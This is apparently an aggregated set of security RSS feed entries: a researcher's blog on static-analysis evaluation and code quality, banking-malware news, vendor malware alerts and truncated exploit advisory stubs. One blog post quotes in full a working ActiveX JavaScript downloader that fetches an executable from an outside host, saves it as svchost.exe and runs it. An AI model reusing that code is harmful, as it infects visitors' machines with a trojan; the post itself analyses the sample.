Then, once these actions are detected, the tool increments a global false-positiveness score for this reported weakness. We then only have to set a threshold in order to know what correctness we want to have; this is really tied to the source code and how the program is developed. Even though this evaluation method is not perfect, it was adapted to the C test cases we had in SATE 2008 since the global code quality was good. We can even say that the software was well written; it was then okay to make some assumptions on the code such as:
* If the size of the destination buffer is computed from the size of the source buffer, the size is good (basically: no off-by-one)
Also, the tool itself needs some information on the source code since it uses regular expressions to match the "actions"... Here we are for a quick explanation, and here are the slides: SAW: Automated Evaluation of SCA output

==> ph34r the script kiddies: Whitehouse.org

http://rgaucher.info/feed/rss2 I was just reading this news (reported by Kanedaa), decided to look closer to the content of this "malware" stuff to see if there was some nice techniques behind this so called "attack". Oh men! How disappointing to see that this was done by script kiddies... the "obfuscation" consist of 3 levels of URL encoded javascript... yeah... URL encoding is for sure an obfuscation very hard to prettify. And the final code was just not obfuscated either... Just this: function myCreateOB(o, n) { var r = null; try { eval('r = o.CreateObject(n)') }catch(e){} if (! r) {try { eval('r = o.CreateObject(n, "")') }catch(e){} } if (! r) {try { eval('r = o.CreateObject(n, "", "")') }catch(e){}} if (! r) {try { eval('r = o.GetObject("", n)') }catch(e){}} if (! r) {try { eval('r = o.GetObject(n, "")') }catch(e){}} if (! r) {try { eval('r = o.GetObject(n)') }catch(e){} } return(r); } function Go(a) { var s = myCreateOB(a, "WS"+"cr"+"ip"+"t.S"+"he"+"ll"); var o = myCreateOB(a, "AD"+"OD"+"B.St"+"re"+"am"); var e = s.Environment("Process"); var xml = null; var url = 'http://ad.ox88.info/bbs.jpg'; var bin = e.Item("TEMP") + "svchost.exe"; var dat; try { xml=new XMLHttpRequest(); } catch(e) { try { xml = new ActiveXObject("Mic"+"ros"+"of"+"t.XM"+"LHT"+"TP"); } catch(e) { xml = new ActiveXObject("MSX"+"ML2.Ser"+"verXM"+"LHT"+"TP"); } } if (! 
xml) return(0); xml.open("GET", url, false) xml.send(null); dat = xml.responseBody; o.Type = 1; o.Mode = 3; o.Open(); o.Write(dat); o.SaveToFile(bin, 2); s.Run(bin,0); } function mywoewd() { var i = 0; var ss11='{7F5B7F'; var ss12='63-F06'; var ss13='F-4331-8A'; var ss14='26-339E0' var ss15='3C0AE3D}'; var ss1=ss11+ss12+ss13+ss14+ss15 var ss2="{BD96"+"C55"+"6-65A3-1"+"1D0-98"+"3A-00C04F"+"C29E36}"; var ss3="{AB9"+"BCEDD-E"+"C7E-47"+"E1-93"+"22-D4"+"A210617116}"; var ss4="{00"+"06F"+"033-000"+"0-0000-C0"+"00-00000"+"0000046}"; var ss5="{0006"+"F03A-0000-00"+"00-C000-00"+"00000"+"00046}"; var t = new Array(ss1,ss2,ss3,ss4,ss5,null); while (t[i]) { var a = null; if (t[i].substring(0,1) == '{') { a = document.createElement("object"); a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1)); } else { try { a = new ActiveXObject(t[i]); } catch(e){} } if (a) { try { var b = myCreateOB(a, "WSc"+"rip"+"t.Sh"+"ell"); if (b) { Go(a); return(0); } } catch(e){} } i++; } } As reported by Trend Micro, this is supposed to be a download of the trojan: TROJ_DELF.GKP ... that doesn't mean anything to me but anyway, my AV didn't detect it :)

==> Yet another study on code quality: A Tale of Four Kernels

http://rgaucher.info/feed/rss2 If, like me, you are interested in code quality and the general conclusions one can draw from code quality studies, I really recommend reading this paper: A Tale of Four Kernels by Diomidis Spinellis, ICSE '08: Proceedings of the 30th International Conference on Software Engineering. I just want to quote a part of the conclusion by the author: "Therefore, the most we can read from the overall balance of marks is that open source development approaches do not produce software of markedly higher quality than proprietary software development." The only problem with this statement is that it is based on the fact that the metrics he used were not weighted for their importance for "Code Quality" (if this means something). Therefore, the comparison between the Windows research kernel and Linux seems a little bit awkward to me. Anyway, this is a very interesting paper about code quality, with lots of interesting ideas from the author of CScout.

==> Static Analysis Tool Exposition is over

http://rgaucher.info/feed/rss2 Yeah, that's sad and also a relief: SATE is over. We actually released today the last stage of the evaluation (basically, the evaluation with some corrections based on comments from the participants). Even though I would have preferred to have more feedback from participants on our evaluation, especially to increase its quality, I still think SATE is a good thing and will be an interesting resource for lots of researchers. This is, as far as I know, the only exhaustive resource on the subject (wild source code + weaknesses). What do I want to do, see next? Since we have accumulated lots of data with the tool reports (raw weaknesses) and the evaluations (I really want to thank MITRE's guys, especially Steve Christey and Bob Schmeichel, for their help), I'm looking forward to doing data analysis and trying to extract some limited results from it. Anyway, this was overall a good experience. I actually did my first real code review, mostly on lighttpd, dspace, mvnforum and naim; I think I know way more about how to detect vulnerabilities; I also have been asking myself about how to rate vulnerabilities such as Cross-Site Scripting (hopefully, I will release the little document I wrote about it); I learned so much about how people write code, trying to understand the design, the code etc. in the applications. Also, hopefully, I will be able to release the website I developed to handle the weaknesses from different tools. It is, I think, interesting if you are working with more than one assessor. You can send evaluations, comments, merge the weaknesses etc. with a web interface. Even though it needs improvements (it has been done in less than 2 weeks) I think this would be an interesting piece of software for people who are dealing with tons of weaknesses. Another interesting point is that we (at NIST) may open that website to everybody in order to make new evaluations and increase the quality of the data we currently have.
Oh well, it seems like a journey is really close to its end; it was such a good time sometimes, and at other times such consuming work. We've been dealing with fifty thousand weaknesses, dozens of tool reports, and almost tens of test cases... I will keep you posted about the next decision we are gonna make with SATE and hope that lots of people will find in this "exposition" the most they could get.

==> Oh please stop it with these ridiculous CAPTCHAs!

http://rgaucher.info/feed/rss2 Marcin just told me about that stupid CAPTCHA from the rapidshare website. Even if I think this is made explicitly to annoy people (this CAPTCHA is used only for free accounts) this is just stupid. Can you really tell which letter has cat or not? I'm sorry but I can't!

==> Accelerate the convergence to the bug: Running the test in 16-bit

http://rgaucher.info/feed/rss2 Yesterday, I came across a case in a piece of software which was really hard for me to understand perfectly. Not only is the code well written (which is always worse for finding bugs :)) but the structure is also well thought out (this is the implementation of an associative array in C in the lighttpd application). The problem I had was to state whether a tool report was a true positive or a false positive. So, as in many cases I've seen in this software, a problem may occur only in the limit cases. This one may occur after INT_MAX insertions in the structure. I don't know if one of you ever tried to do such a thing, but INT_MAX (~2 billion on a typical PC) allocations alone is a lot, so inserting elements in a structure that needs at least 5 (re)allocations is too much. But well, I did it. Also, I ran this test with valgrind using the memory leak check (full check and high definition). I then ran a simple test program to fill this structure in a real condition: a typical x86/32-bit architecture. As I knew it was stupid and didn't even think this could end before 2 days, I started looking in other directions in order to reduce the INT_MAX size for having a reasonable execution time of the test. My first attempt was to shift all the types that are used; I knew this was not perfect because even if I can force my program to use unsigned short instead of size_t, I wouldn't change the size of the pointers: a char * would still be 32-bit (there may be some options in gcc to control the size of the pointers, which I doubt, but I didn't find any). Using this methodology, I was able to make the program crash in the way that would have been a real true positive.
But as I knew it was not good, since the size of the pointers is not modified, and I had the feeling that in that particular structure the case of the possible crash is handled by itself (due to pointer and type limits), I started looking in other directions for running that program in 16-bit, a pseudo-real-16-bit mode. I then started looking into emulators and how to compile code for 16-bit and run it on my Linux (x86/32-bit). After having issues compiling and running the test program with the gnu-m68hc11 ELF package, I found the bcc/elksemu stuff. After compiling and running with the ELKS utilities, the test program didn't crash; it only failed in an assertion test after an allocation... Different behavior with different methods, okay... which is the correct one? Is it a problem of pointer size that made the test run differently than the real program on 32-bit, or maybe a limitation of the elksemu machine? This morning I checked the state of the 32-bit run I launched yesterday, and it was finished... ended by a failed assertion. As expected, pointer size matters when you wanna test the intrinsic limitations of a structure and its behavior using limit cases.

==> Scaling MySQL db

http://rgaucher.info/feed/rss2 I've just come across this interesting blog entry; some numbers on how people (large website companies) are actually using MySQL. http://venublog.com/2008/04/16/notes-from-scaling-mysql-up-or-out/

==> Cybergang plans to use Trojan against U.S. banks

http://rss.techtarget.com/981.xml A cybergang in Eastern Europe revealed plans to attack U.S. banks with a Gozi-like Trojan, according to RSA.

==> Improved Shylock Trojan targets banking users

http://rss.techtarget.com/981.xml The latest variant of the banking Trojan is causing numerous problems, Symantec said.

==> Tilon financial malware targets banks via MitB attack, Trusteer finds

http://rss.techtarget.com/981.xml Tilon is related to the Silon malware detected in 2009. It uses a man-in-the-browser attack to capture form submissions and steal credentials.

==> Citadel malware toolkit going underground, says RSA

http://rss.techtarget.com/981.xml The Citadel crimeware, a toolkit giving cybercriminals sophisticated financial malware, is being taken off the market by its authors, according to experts monitoring its activity.

==> Tinba banking Trojan sniffs network traffic, steals data

http://rss.techtarget.com/981.xml Tinba is among the smallest data-stealing banking Trojans discovered in the wild, according to Danish security firm CSIS Security Group.

==> Ramnit worm variant now dangerous banking malware

http://rss.techtarget.com/981.xml The Ramnit worm now supports man-in-the-middle attacks, giving cybercriminals the ability to drain a victim's bank account.

==> SIEM vendors make the case for extending SIEM product capabilities

http://rss.techtarget.com/981.xml Advanced features can reduce the threat of wire fraud. New rule sets can be shared among banks and credit unions.

==> Key Cloud Privacy Concerns in 2012

http://rss.windowsecurity.com/ This article covers major concerns that companies have when data is stored and processed in the cloud, and things that can be done to better protect against the threat vector.

==> Claims Based Identity: What does it Mean to You? (Part 1)

http://rss.windowsecurity.com/ This article series explores the identity management dilemma by addressing some of the more specific implementation of identity technologies.

==> Video: SCM 2.5 Creating GPOs from Baselines

http://rss.windowsecurity.com/ This video demonstrates the process of conversion of SCM baselines into GPOs.

==> Windows 8 Tablets: Secure enough for the Enterprise?

http://rss.windowsecurity.com/ In this article, we'll look at both the obstacles and the reasons Windows 8 tablets just might be able to overcome barriers and take the enterprise by storm.

==> The Secure Boot Controversy: What does it mean to IT?

http://rss.windowsecurity.com/ In this article we'll talk about what the implications of the Secure Boot feature in Windows 8 are - both good and bad - for businesses

==> Fighting Hackers: Everything You’ve Been Told About Passwords Is Wrong

http://seclists.org/rss/isn.rss Posted by InfoSec News on Oct 19 http://www.wired.com/opinion/2012/10/passwords-and-hackers-security-and-practicality/ By Markus Jakobsson Opinion Wired.com 10.18.12 Security is not just about strong encryption, good anti-virus software, or techniques like two-factor authentication. It's also about the fuzzy things ... involving people. That's where the security game is often won or lost. Just ask Mat Honan. We -- the users -- are supposed to be responsible, and...

==> House of Commons worker charged with hacking Quebec government website

http://seclists.org/rss/isn.rss Posted by InfoSec News on Oct 19 http://www.canada.com/news/national/House+Commons+worker+charged+with+hacking+Quebec+government/7410388/story.html By Jordan Press Postmedia News October 18, 2012 OTTAWA -- A 28-year-old man faces computer crime charges for allegedly hacking the Quebec government's website in April while he was on contract for both the RCMP and the House of Commons. According to the RCMP, the hack originated from the House of Commons network when someone...

==> The White House Denies Ordering a Secret Report Clearing Huawei of Espionage

http://seclists.org/rss/isn.rss Posted by InfoSec News on Oct 19 http://www.theatlanticwire.com/technology/2012/10/white-house-denies-ordering-secret-report-clearing-huawei-espionage/58091/ By Alexander Abad-Santos The Atlantic Wire Oct 18, 2012 Cue the conspiracy theories: an 18-month, Reuters says it got its hands on "a White House-ordered review of security risks posed by suppliers to U.S. telecommunications companies" that cleared Chinese telecom giant Huawei of allegations of actively...

==> Businesses face increasing challenge of targeted cyber attack: survey

http://seclists.org/rss/isn.rss Posted by InfoSec News on Oct 19 http://security.cbronline.com/news/businesses-face-increasing-challenge-of-targeted-cyber-attack-survey-191012 By CBR Staff Writer 19 October 2012 Only 27% have heard about Stuxnet and 13% about Duqu About 52% of IT specialists believe that enterprise networks will be increasingly targeted by hack attacks, posing serious challenge to IT administrators, according to a survey conducted by B2B International in July 2012. One third of those...

==> Who is tweeting from the NSA's parking lot?

http://seclists.org/rss/isn.rss Posted by InfoSec News on Oct 18 http://www.computerworld.com/s/article/9232476/Who_is_tweeting_from_the_NSA_39_s_parking_lot_ By Jeremy Kirk IDG News Service October 17, 2012 From Google Maps, the U.S. National Security Agency's parking lot has a larger footprint than the building itself. And for the high secrecy surrounding what goes on inside, there is plenty of information flowing just outside. In a demonstration on Wednesday at the Breakpoint security...

==> Tale of the encrypted

http://seclists.org/rss/isn.rss Posted by InfoSec News on Oct 18 http://www.theage.com.au/entertainment/books/tale-of-the-encrypted-20121012-27hsy.html By Peter Pierce The Age October 13, 2012 MIDNIGHT EMPIRE By Andrew Croome Allen & Unwin, $27.99 YET another Vogel award winner for the best unpublished first novel has kicked on: after Document Z (2009), his fictionalised account of the Petrov affair of 1951, Andrew Croome has followed up with a taut, exciting and complex thriller, Midnight Empire....

==> Paper: NATO eyes Russia as potential cyber-aggressor

http://seclists.org/rss/isn.rss Posted by InfoSec News on Oct 18 http://www.panarmenian.net/eng/news/128119/ PanARMENIAN.Net October 18, 2012 NATO considers Russia one of the key potential cyber-aggressors for the North Atlantic alliance, the Kommersant business daily reported, citing its sources in NATO's headquarters. NATO plans to hold its Cyber Coalition 2012 war game on November 13-16. In line with the exercise's scenario, NATO members Hungary and Estonia come under large-scale cyber attacks...

==> Computer Viruses Are "Rampant" on Medical Devices in Hospitals

http://seclists.org/rss/isn.rss Posted by InfoSec News on Oct 18 http://www.technologyreview.com/news/429616/computer-viruses-are-rampant-on-medical-devices/ By David Talbot Technology Review October 17, 2012 Computerized hospital equipment is increasingly vulnerable to malware infections, according to participants in a recent government panel. These infections can clog patient-monitoring equipment and other software systems, at times rendering the devices temporarily inoperable. While no injuries have...

==> Pacemaker hack can deliver deadly 830-volt jolt

http://seclists.org/rss/isn.rss Posted by InfoSec News on Oct 17 http://www.cio.com.au/article/439322/pacemaker_hack_can_deliver_deadly_830-volt_jolt/ By Jeremy Kirk IDG News Service 17 October, 2012 Pacemakers from several manufacturers can be commanded to deliver a deadly, 830-volt shock from someone on a laptop up to 50 feet away, the result of poor software programming by medical device companies. The new research comes from Barnaby Jack of security vendor IOActive, known for his analysis of other...

==> 3 Must-Fix Vulnerabilities Top Oracle CPU Patches

http://seclists.org/rss/isn.rss Posted by InfoSec News on Oct 17 http://www.darkreading.com/vulnerability-management/167901026/security/news/240009195/3-must-fix-vulnerabilities-top-oracle-cpu-patches.html By Ericka Chickowski Contributing Writer Dark Reading Oct 17, 2012 Systems administrators on all IT fronts will have their hands busy patching Oracle vulnerabilities across the software giant's portfolio with the release this week of the company's quarterly Critical Patch Update. Security...

==> Bank Hacks: Iran Blame Game Intensifies

http://seclists.org/rss/isn.rss Posted by InfoSec News on Oct 17 http://www.informationweek.com/security/attacks/bank-hacks-iran-blame-game-intensifies/240009068 By Mathew J. Schwartz InformationWeek October 15, 2012 Who's behind the continuing series of attacks against the websites of numerous U.S. banks? A flurry of news reports Friday pointed the finger squarely at Iran. "They have been going after everyone--financial services, Wall Street," a senior defense official, speaking...

==> Hacking may cost Naperville more than $600,000

http://seclists.org/rss/isn.rss Posted by InfoSec News on Oct 17 http://www.dailyherald.com/article/20121016/news/710169607/ By Justin Kmitch Daily Herald 10/17/2012 Hackers who recently compromised the security of Naperville's website, email and other online services not only put the city into an informational black hole but also a financial black hole. City council members on Tuesday approved spending as much as $673,000 to acquire network security hardware and software, computer servers, and...

==> Gartner spells out magic behind quadrants

http://seclists.org/rss/isn.rss Posted by InfoSec News on Oct 17 http://www.theregister.co.uk/2012/10/16/gartner_magic_quadrant_research_methodology_revealed/ By Simon Sharwood, APAC Editor The Register 16th October 2012 Analyst group Gartner has detailed how it prepares its sometimes-controversial magic quadrants, revealing that a two-hour demo is sometimes part of the research process. Gartner already offers a detailed explanation of how it compiles its Magic Quadrants here. But in an exchange with...

==> BayThreat - December 7th - 8th 2012 - Call For Papers

http://seclists.org/rss/isn.rss Posted by InfoSec News on Oct 15 http://www.baythreat.org/cfp.html Call For Abstracts The Call for Papers for the 3rd BayThreat security conference is open! BayThreat is a 2 day event in Sunnyvale, CA, December 7th and 8th. The theme for BayThreat is a new spin on the dichotomy of attacking and defending in information security. We're calling out all of the attackers and defenders that are on the front lines of the battle. We'll analyse the latest attack...

==> Developers ignore their security responsibilities: Oracle

http://seclists.org/rss/isn.rss Posted by InfoSec News on Oct 15 http://www.zdnet.com/developers-ignore-their-security-responsibilities-oracle-7000005808/ By Michael Lee ZDNet News October 16, 2012 Software developers are ignoring their responsibilities to protect and design infrastructure that is properly secured, according to Oracle Chief Security Officer Mary Ann Davidson. Speaking at the Australian Information Security Association's National Conference 2012 in Sydney today, Davidson said that...

==> Please update your RSS readers and bookmarks, the Security Labs blog has moved!

http://securitylabs.websense.com/content/alertsRSS.xml Please update your RSS readers and bookmarks, we've moved to a new home!
In addition to the new look-and-feel we have a few new things in place.
- We have merged the blog and alerts. If you subscribe to our Alerts you will still get emails when we see something that warrants an alert
- Added Categories to posts. This will make it much easier to find stories around the same topic
- Added Fliptop integration which makes it really easy to subscribe to this blog in different ways
We will add the ability to post Comments to the blog as well in the near future. We hope you'll like it. Remember to update your RSS feeder address by clicking on "Subscribe" in the top-right corner as the old RSS feed will not be updated. Do stop by to say hi to us at http://community.websense.com/blogs/securitylabs/

==> Malicious Web Site / Malicious Code: Fake Apple App Store Malicious Spam

http://securitylabs.websense.com/content/alertsRSS.xml Websense Security Labs ThreatSeeker Network has discovered that Apple's App Store has become the latest target for email attacks and spam. App Store is the service provided by Apple Inc. as a platform to purchase and download applications for iPhone, iPod touch, and iPad. The attack comes in the form of a fake invoice email. With Apple's App Store being one of the most popular shopping platforms for multimedia, this kind of App Store invoice email is familiar to users and tends to be received frequently. As demonstrated here, cyber-criminals clearly jump at a chance to spread their spam using any available means. The content in this campaign resides on compromised Web sites and serves a combination of pharmaceutical spam along with exploits that are delivered in the background. Some of the messages serve only pharmaceutical spam and some combine spam with exploits. In the example below, clicking the link in the message redirects the user to a site with a single link labeled "visit". In the background, a known exploit pack called "Eleonore" is delivered to the user's machine. If the user clicks on the link, they are redirected to a "Canadian Pharmacy" Web site. In this particular attack instance the file dropped by the exploit pack has a 29% detection rate. Screen shot of the email: Exploits are delivered on this page in the background: Pharmaceutical spam Web site: Websense Messaging and Websense Web Security customers are protected against this attack.

==> Malicious Web Site / Malicious Code: Skype Toolbar for Outlook Scam

http://securitylabs.websense.com/content/alertsRSS.xml Websense Security Labs ThreatSeeker Network has discovered a new wave of email attacks targeting the Skype Email Toolbar. Up to now, the amount of spam is not large, but we believe it will increase. The spam email message contains a file attachment named SkypeToolbarForOutlook.zip, which could easily deceive users but is in fact a backdoor trojan that has a very low AV detection. The spam email copies the look and feel of the legitimate application from Skype. Screen shot of the email: Websense Messaging and Websense Web Security customers are protected against this attack.

==> Malicious Web Site / Malicious Code: Searching for Corey Haim Leads to Rogue AV

http://securitylabs.websense.com/content/alertsRSS.xml Websense Security Labs ThreatSeeker Network has discovered that search terms related to Corey Haim have become the latest target for Blackhat SEO poisoning attacks. Corey Haim, 1980s teen idol actor and a star of such famous movies as "The Lost Boys" and "License to Drive", was found dead in his Los Angeles apartment at the age of only 38 on Wednesday. Whether it's a natural disaster or a death, Blackhats monitor and adapt to popular search trends. Not long after the sad news emerged, the search phrase "Corey Haim" became one of the hottest topics in Google trends. Screenshot of the Google trend: Cybercriminals again jump at a chance to spread their rogue AVs. When users enter keywords such as "Corey Haim death" in Google, some of the results will lead them to download fake security software. The downloaded FakeAV file has only 17% coverage from antivirus products. Google search results for "Corey Haim death" that lead to rogue AVs: Websense Messaging and Websense Web Security customers are protected against this attack.

==> Malicious Web Site / Malicious Code: BBS of Sougou Compromised

http://securitylabs.websense.com/content/alertsRSS.xml Websense Security Labs ThreatSeeker Network has discovered that the BBS of Sougou has been compromised. The Sougou BBS home page and other pages on the site have been injected with a malicious script. The script creates an IFrame that redirects users to an exploit site: a 5-day-old domain at [snip]ow.info. The latter performs some checks before delivering the exploits, in order to subvert any analysis attempts. At the time of writing this alert, the BBS of Sougou is still injected with the malicious script, but the exploit site is down. This could change at any moment. This is the injected code in the home page and its contents: Here is the exploit page: Websense Messaging and Websense Web Security customers are protected against this attack.

==> Malicious Web Site / Malicious Code: Blackhat SEO turns to PDF with Chile and Hawaii disasters

http://securitylabs.websense.com/content/alertsRSS.xml Over 13% of all Google searches for popular and trending topics lead to malicious links, and searches for the latest news on the earthquake in Chile and the tsunami hitting Hawaii are no exception. Both are now used to lure people into downloading fake antivirus products. Usually the links in the search results look like ordinary links pointing to regular web pages. This time the bad guys have changed tactics to make their search results look even more convincing, by tricking Google into thinking the page is a PDF file. As you can see above, Google tells you the file format is PDF and not HTML. That's not true: it is in fact a regular HTML page that, when visited, redirects the user to a page that looks like this - just another rogue AV fake scanning page. This one, just like the majority of rogue AV sites we have seen this week, is in the .IN TLD, the top-level domain for India. Making the search result look like a PDF gives the link more authenticity. Perhaps it's a research paper, or at least a better-written article. The likelihood that a user will click on these types of links is probably higher than if it were just another random web link. This is the first time we've seen the attackers use this approach, but considering how aggressive the rogue AV gangs are, it's not a surprise that they continue to refine their techniques to get people to "buy" their products. The Rogue AV file itself is currently detected by 26.20% of the antivirus engines used by VirusTotal. Websense Messaging and Websense Web Security customers are protected against this attack.

==> Malicious Web Site / Malicious Code: Searching For Joannie Rochette Leads To Rogue AV

http://securitylabs.websense.com/content/alertsRSS.xml Websense Security Labs ThreatSeeker Network has detected black hat Search Engine Optimization (SEO) campaigns abusing the name of an Olympic figure skater who is very popular in recent news. Joannie Rochette is a Canadian figure skater and the 2009 world silver medallist. In the 2010 Winter Olympics in Vancouver, despite the loss of her mother just 48 hours before her competition, she delivered a sensational performance and qualified to compete for gold. The bad guys still took advantage of this tragic incident and used it in the infamous Black SEO poisoning attacks. Searching for Joannie Rochette in reputable search engines leads to rogue AV. This use of the Black SEO technique is even more pertinent now that the results have been announced, with Rochette receiving a bronze medal for her performance. Once the victim clicks on the poisoned search results, he/she is redirected to the rogue AV page, and a fake anti-virus executable asks for the victim's confirmation before being downloaded. Related topics are 4th and 7th on Google's Hot Trends USA list. Joannie Rochette is currently the most popular search term on Google Canada at the time of writing: This isn't the first time Black SEO attacks have targeted events and figures related to the Olympics this year. Websense Messaging and Websense Web Security customers are protected against this attack.

==> Malicious Web Site / Malicious Code: Bloom Box Black SEO

http://securitylabs.websense.com/content/alertsRSS.xml Websense Security Labs ThreatSeeker Network has detected that search terms related to Bloom Energy and its Bloom Box fuel cell have become the latest target for Blackhat SEO poisoning attacks. Bloom Box is a breakthrough technology in the energy sector that could revolutionize the way electricity is generated today. As people become interested in finding more information on this technology, related search terms are currently gaining momentum, and as they do so Blackhat SEO attacks are starting to climb up the search result listings. At the moment, according to the VirusTotal report, only 10% of antivirus products are detecting the threat. Video of the Bloom Box SEO in action: Websense Messaging and Websense Web Security customers are protected against this attack.

==> Internet Explorer 9 XSS Filter Bypass

http://securityreason.com/rss/SecurityAlert Topic: Internet Explorer 9 XSS Filter Bypass Risk: Low Text: # Internet Explorer 9 XSS Filter Bypass # Discovered by: Jean Pascal Pereira

==> F5 FirePass SSL VPN 4xxx Series & Arbitrary URL Redirection

http://securityreason.com/rss/SecurityAlert Topic: F5 FirePass SSL VPN 4xxx Series & Arbitrary URL Redirection Risk: Low Text:1. OVERVIEW F5 FirePass SSL VPN is vulnerable to Open URL Redirection. 2. BACKGROUND F5 FirePass SSL VPN provides se...

==> Henok CMS SQL Injection & Easy Login Vulnerability

http://securityreason.com/rss/SecurityAlert Topic: Henok CMS SQL Injection & Easy Login Vulnerability Risk: Medium Text:-=- In The Name Of God -=- -- @ Henok CMS SQL Injection & Easy Login Vulnerability ...

==> gonginteractive Web Design SQL Injection Vulnerability

http://securityreason.com/rss/SecurityAlert Topic: gonginteractive Web Design SQL Injection Vulnerability Risk: Medium Text: ## gonginteractive Web Design Sql Injection Vulnerability ## + # Expl...

==> DotProject 2.1.5 XSS and SQL Injection

http://securityreason.com/rss/SecurityAlert Topic: DotProject 2.1.5 XSS and SQL Injection Risk: Low Text:Information -- Name : XSS and SQL Injection Vulnerabilities in DotProject Software : DotProject 2.1.5 and possibly b...

==> ClipBucket 2.6 XSS Vulnerabilities

http://securityreason.com/rss/SecurityAlert Topic: ClipBucket 2.6 XSS Vulnerabilities Risk: Low Text:Information -- Name : XSS Vulnerabilities in ClipBucket Software : ClipBucket 2.6 and possibly below. Vendor Homepa...

==> CMSMini 0.2.2 XSS Vulnerabilities

http://securityreason.com/rss/SecurityAlert Topic: CMSMini 0.2.2 XSS Vulnerabilities Risk: Low Text:Information -- Name : XSS Vulnerabilities in CMSMini Software : CMSMini 0.2.2 and possibly below. Vendor Homepage :...

==> TaskFreak 0.6.4 XSS Vulnerabilities

http://securityreason.com/rss/SecurityAlert Topic: TaskFreak 0.6.4 XSS Vulnerabilities Risk: Low Text:Information -- Name : XSS Vulnerabilities in TaskFreak Software : TaskFreak 0.6.4 and possibly below. Vendor Homepa...

==> WordPress Wordfence Security XSS and IAA vulnerabilities

http://securityreason.com/rss/SecurityAlert Topic: WordPress Wordfence Security XSS and IAA vulnerabilities Risk: Low Text:I want to warn you about Cross-Site Scripting and Insufficient Anti-automation vulnerabilities in Wordfence Security for Word...

==> CA ARCserve Backup Security Notice

http://securityreason.com/rss/SecurityAlert Topic: CA ARCserve Backup Security Notice Risk: Medium Text:CA20121018-01: Security Notice for CA ARCserve Backup Issued: October 18, 2012 CA Technologies support is alerting custom...

==> Campaign Enterprise 11 SQL Injection & Unauthorized Access

http://securityreason.com/rss/SecurityAlert Topic: Campaign Enterprise 11 SQL Injection & Unauthorized Access Risk: Medium Text:Overview Campaign Enterprise 11, by ArialSoftware (www.arialsoftware.com), "is a mass email system you install on your...

==> ManageEngine Security Manager Plus <=5.5 Code Execution

http://securityreason.com/rss/SecurityAlert Topic: ManageEngine Security Manager Plus <=5.5 Code Execution Risk: High Text:## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please...

==> ManageEngine Security Manager Plus 5.5 SQL Injection

http://securityreason.com/rss/SecurityAlert Topic: ManageEngine Security Manager Plus 5.5 SQL Injection Risk: Medium Text:#!/usr/bin/python #+ --+ # Exploit Title : Security Manager Plus <= 5.5 build 55...

==> ManageEngine Security Manager Plus 5.5 Traversal

http://securityreason.com/rss/SecurityAlert Topic: ManageEngine Security Manager Plus 5.5 Traversal Risk: High Text:#!/usr/bin/python #+ --+ # Exploit Title : Security Manager Plus <= 5.5 build 55...

==> Joomla Tag SQL Injection

http://securityreason.com/rss/SecurityAlert Topic: Joomla Tag SQL Injection Risk: Medium Text: Exploit Title: Joomla tag Remote Sql Exploit dork: inurl:index.php?option=com_tag Date: [18-10-2012] Author: Dan...

==> Joomla Freestyle Support 1.9 SQL Injection

http://securityreason.com/rss/SecurityAlert Topic: Joomla Freestyle Support 1.9 SQL Injection Risk: Medium Text: Exploit Title: Joomla Freestyle Support com_fss sqli Dork: N/A Date: [17-10-2012] Author: Daniel Barragan "D4NB4...

==> Joomla Commedia 3.1 SQL Injection

http://securityreason.com/rss/SecurityAlert Topic: Joomla Commedia 3.1 SQL Injection Risk: Medium Text: Exploit Title: Joomla commedia Remote Exploit dork: inurl:index.php?option=com_commedia Date: [18-10-2012] Autho...

==> CMSQLITE 1.3.2 Multiple Web Vulnerabilities

http://securityreason.com/rss/SecurityAlert Topic: CMSQLITE 1.3.2 Multiple Web Vulnerabilities Risk: Medium Text:Title: CMSQLITE v1.3.2 - Multiple Web Vulnerabilities Date: == 2012-10-18 References: == http://www.vuln...

==> Oracle Database Authentication Protocol Security Bypass

http://securityreason.com/rss/SecurityAlert Topic: Oracle Database Authentication Protocol Security Bypass Risk: Medium Text:Oracle Database is prone to a remote security-bypass vulnerability that affects the authentication protocol. An attacker ca...

==> OTRS 3.1 Stored XSS Vulnerability

http://securityreason.com/rss/SecurityAlert Topic: OTRS 3.1 Stored XSS Vulnerability Risk: Low Text:#!/usr/bin/python ''' Author: Mike Eduard - Znuny - Enterprise Services for OTRS Product: OTRS Open Technology Real Se...

==> RealPlayer 15.0.6.14 suffers from Arbitrary Code Execution

http://securityreason.com/rss/SecurityAlert Topic: RealPlayer 15.0.6.14 suffers from Arbitrary Code Execution Risk: High Text:Title : RealPlayer 15.0.6.14 suffers from Arbitrary Code Execution Version : 15.0.6.14 Date : 2012-10-18 Vendor : ...

==> Palo Alto Networks GlobalProtect Man-In-The-Middle

http://securityreason.com/rss/SecurityAlert Topic: Palo Alto Networks GlobalProtect Man-In-The-Middle Risk: Low Text: SySS-Advisory: MitM-vulnerability in Palo Alto Networks GlobalProtect Prob...

==> Unirgy uStoreLocator Magento Extension SQL Injection

http://securityreason.com/rss/SecurityAlert Topic: Unirgy uStoreLocator Magento Extension SQL Injection Risk: Medium Text:SEC Consult Vulnerability Lab Security Advisory < 20121017-1 > == title: SQL Injection ...

==> ModSecurity 2.6.8 multipart/invalid part ruleset bypass

http://securityreason.com/rss/SecurityAlert Topic: ModSecurity 2.6.8 multipart/invalid part ruleset bypass Risk: Medium Text:SEC Consult Vulnerability Lab Security Advisory < 20121017-0 > == title: ModSecurity mul...

==> jCore 1.0pre Cross Site Scripting & SQL Injection

http://securityreason.com/rss/SecurityAlert Topic: jCore 1.0pre Cross Site Scripting & SQL Injection Risk: Medium Text:Advisory ID: HTB23107 Product: jCore Vendor: jcore.net Vulnerable Version(s): 1.0pre and probably prior Tested Version: 1....

==> ATutor AContent 1.2 XSS & Authentication & SQL Injection

http://securityreason.com/rss/SecurityAlert Topic: ATutor AContent 1.2 XSS & Authentication & SQL Injection Risk: Medium Text:Advisory ID: HTB23117 Product: AContent Vendor: ATutor Vulnerable Version(s): 1.2 and probably prior Tested Version: 1.2 V...

==> Subrion CMS 2.2.1 XSS / CSRF / SQL Injection

http://securityreason.com/rss/SecurityAlert Topic: Subrion CMS 2.2.1 XSS / CSRF / SQL Injection Risk: Medium Text:Advisory ID: HTB23113 Product: Subrion CMS Vendor: The Subrion development team Vulnerable Version(s): 2.2.1 and probably pr...

==> Pmsme SQL Injection Vulnerability

http://securityreason.com/rss/SecurityAlert Topic: Pmsme SQL Injection Vulnerability Risk: Medium Text: ## # Title: Powered By: Pmsme SQL Injection Vulnerability # Google Dork: inurl:"page.php?p_id=" Powered By: P...

